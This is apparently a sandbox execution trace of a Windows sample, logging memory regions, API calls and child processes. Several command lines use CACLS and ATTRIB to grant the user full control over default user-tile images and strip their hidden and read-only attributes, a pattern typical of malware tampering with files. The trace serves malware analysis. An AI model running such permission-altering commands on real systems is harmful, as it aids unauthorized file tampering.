os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "331" os_parent_pid = "0x47c" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25078 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25079 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25080 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25081 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 25082 start_va = 0x950000 end_va = 0x958fff entry_point = 0x950000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 25083 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25084 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25085 
start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25086 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 25087 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25088 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25089 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25090 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25091 start_va = 0xd0000 end_va = 0xdffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 25092 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 25093 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25094 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25095 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25096 start_va = 
0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25097 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25098 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25099 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 454 os_tid = 0x678 Thread: id = 455 os_tid = 0xc48 Process: id = "333" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16ee0" os_pid = "0xcbc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "331" os_parent_pid = "0x47c" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25100 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25101 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000030000" filename = "" Region: id = 25102 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25103 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 25104 start_va = 0x2b0000 end_va = 0x2b6fff entry_point = 0x2b0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 25105 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25106 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25107 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25108 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 25109 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25110 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25111 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25112 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: 
"c:\\windows\\system32\\locale.nls") Region: id = 25113 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 25114 start_va = 0x450000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 25115 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 25116 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25117 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25118 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25119 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25120 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25121 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25122 start_va = 0x76b40000 end_va = 0x76c08fff 
entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25123 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25124 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25125 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25126 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25127 start_va = 0x170000 end_va = 0x237fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 25128 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25129 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 456 os_tid = 0xbb4 Process: id = "334" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0xcf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User 
Account Pictures\\Default Pictures\\usertile13.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25130 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25131 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25132 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25133 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 25134 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 25135 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25136 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25137 start_va = 0x7ffb0000 end_va = 0x7ffd2fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25138 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 25139 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25140 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25141 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25142 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25143 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 25144 start_va = 0x510000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 25145 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 25146 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25147 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25148 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 
region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25149 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25150 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25151 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25152 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25153 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25154 start_va = 0x3f0000 end_va = 0x4b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 25155 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25156 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 25157 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 25158 start_va = 
0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 25159 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 25160 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 25161 start_va = 0x520000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 25162 start_va = 0x630000 end_va = 0x122ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 25163 start_va = 0x1230000 end_va = 0x1392fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001230000" filename = "" Region: id = 25164 start_va = 0x13a0000 end_va = 0x166efff entry_point = 0x13a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 457 os_tid = 0x170 [0180.130] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24ff1c | out: lpSystemTimeAsFileTime=0x24ff1c*(dwLowDateTime=0xa0ba36e0, dwHighDateTime=0x1d440a9)) [0180.130] GetCurrentProcessId () returned 0xcf8 [0180.130] GetCurrentThreadId () returned 0x170 [0180.130] GetTickCount () returned 0x33e95 [0180.130] QueryPerformanceCounter (in: lpPerformanceCount=0x24ff14 | out: lpPerformanceCount=0x24ff14*=23691910613) returned 1 [0180.131] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0180.131] __set_app_type (_Type=0x1) [0180.131] __p__fmode () returned 0x76b331f4 [0180.131] __p__commode () returned 0x76b331fc [0180.131] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0180.131] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, 
_DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0180.131] GetCurrentThreadId () returned 0x170 [0180.131] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x170) returned 0x38 [0180.131] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0180.131] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0180.131] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.132] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0180.132] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24feac | out: phkResult=0x24feac*=0x0) returned 0x2 [0180.132] VirtualQuery (in: lpAddress=0x24fee3, lpBuffer=0x24fe7c, dwLength=0x1c | out: lpBuffer=0x24fe7c*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0180.132] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24fe7c, dwLength=0x1c | out: lpBuffer=0x24fe7c*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0180.132] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fe7c, dwLength=0x1c | out: lpBuffer=0x24fe7c*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0180.132] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fe7c, dwLength=0x1c | out: lpBuffer=0x24fe7c*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0180.132] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fe7c, dwLength=0x1c | out: lpBuffer=0x24fe7c*(BaseAddress=0x250000, AllocationBase=0x0, 
AllocationProtect=0x0, RegionSize=0xa0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0180.132] GetConsoleOutputCP () returned 0x1b5 [0180.132] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0180.132] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0180.132] _get_osfhandle (_FileHandle=1) returned 0x7 [0180.133] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0180.133] _get_osfhandle (_FileHandle=1) returned 0x7 [0180.133] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0180.133] _get_osfhandle (_FileHandle=1) returned 0x7 [0180.133] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0180.133] _get_osfhandle (_FileHandle=0) returned 0x3 [0180.133] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0180.133] _get_osfhandle (_FileHandle=0) returned 0x3 [0180.133] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0180.133] GetEnvironmentStringsW () returned 0x300308* [0180.134] FreeEnvironmentStringsW (penv=0x300308) returned 1 [0180.134] GetEnvironmentStringsW () returned 0x300308* [0180.134] FreeEnvironmentStringsW (penv=0x300308) returned 1 [0180.134] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ee1c | out: phkResult=0x24ee1c*=0x40) returned 0x0 [0180.134] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ee24, lpData=0x24ee28, lpcbData=0x24ee20*=0x1000 | out: lpType=0x24ee24*=0x0, lpData=0x24ee28*=0xb8, lpcbData=0x24ee20*=0x1000) returned 0x2 [0180.134] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ee24, lpData=0x24ee28, lpcbData=0x24ee20*=0x1000 | out: lpType=0x24ee24*=0x4, lpData=0x24ee28*=0x1, lpcbData=0x24ee20*=0x4) returned 0x0 [0180.134] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ee24, lpData=0x24ee28, lpcbData=0x24ee20*=0x1000 | out: lpType=0x24ee24*=0x0, lpData=0x24ee28*=0x1, lpcbData=0x24ee20*=0x1000) returned 0x2 [0180.134] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ee24, lpData=0x24ee28, lpcbData=0x24ee20*=0x1000 | out: lpType=0x24ee24*=0x4, lpData=0x24ee28*=0x0, lpcbData=0x24ee20*=0x4) returned 0x0 [0180.134] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ee24, lpData=0x24ee28, lpcbData=0x24ee20*=0x1000 | out: lpType=0x24ee24*=0x4, lpData=0x24ee28*=0x40, lpcbData=0x24ee20*=0x4) returned 0x0 [0180.134] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ee24, lpData=0x24ee28, lpcbData=0x24ee20*=0x1000 | out: lpType=0x24ee24*=0x4, lpData=0x24ee28*=0x40, lpcbData=0x24ee20*=0x4) returned 0x0 [0180.134] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ee24, lpData=0x24ee28, lpcbData=0x24ee20*=0x1000 | out: lpType=0x24ee24*=0x0, lpData=0x24ee28*=0x40, lpcbData=0x24ee20*=0x1000) returned 0x2 [0180.134] RegCloseKey (hKey=0x40) returned 0x0 [0180.134] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ee1c | out: phkResult=0x24ee1c*=0x40) returned 0x0 [0180.134] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ee24, lpData=0x24ee28, lpcbData=0x24ee20*=0x1000 | out: lpType=0x24ee24*=0x0, lpData=0x24ee28*=0x40, lpcbData=0x24ee20*=0x1000) returned 0x2 [0180.134] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ee24, lpData=0x24ee28, lpcbData=0x24ee20*=0x1000 | out: lpType=0x24ee24*=0x4, lpData=0x24ee28*=0x1, lpcbData=0x24ee20*=0x4) returned 0x0 [0180.134] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ee24, 
lpData=0x24ee28, lpcbData=0x24ee20*=0x1000 | out: lpType=0x24ee24*=0x0, lpData=0x24ee28*=0x1, lpcbData=0x24ee20*=0x1000) returned 0x2 [0180.134] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ee24, lpData=0x24ee28, lpcbData=0x24ee20*=0x1000 | out: lpType=0x24ee24*=0x4, lpData=0x24ee28*=0x0, lpcbData=0x24ee20*=0x4) returned 0x0 [0180.134] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ee24, lpData=0x24ee28, lpcbData=0x24ee20*=0x1000 | out: lpType=0x24ee24*=0x4, lpData=0x24ee28*=0x9, lpcbData=0x24ee20*=0x4) returned 0x0 [0180.134] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ee24, lpData=0x24ee28, lpcbData=0x24ee20*=0x1000 | out: lpType=0x24ee24*=0x4, lpData=0x24ee28*=0x9, lpcbData=0x24ee20*=0x4) returned 0x0 [0180.134] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ee24, lpData=0x24ee28, lpcbData=0x24ee20*=0x1000 | out: lpType=0x24ee24*=0x0, lpData=0x24ee28*=0x9, lpcbData=0x24ee20*=0x1000) returned 0x2 [0180.134] RegCloseKey (hKey=0x40) returned 0x0 [0180.135] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88638f [0180.135] srand (_Seed=0x5b88638f) [0180.135] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\"" [0180.135] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp\"" [0180.135] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 
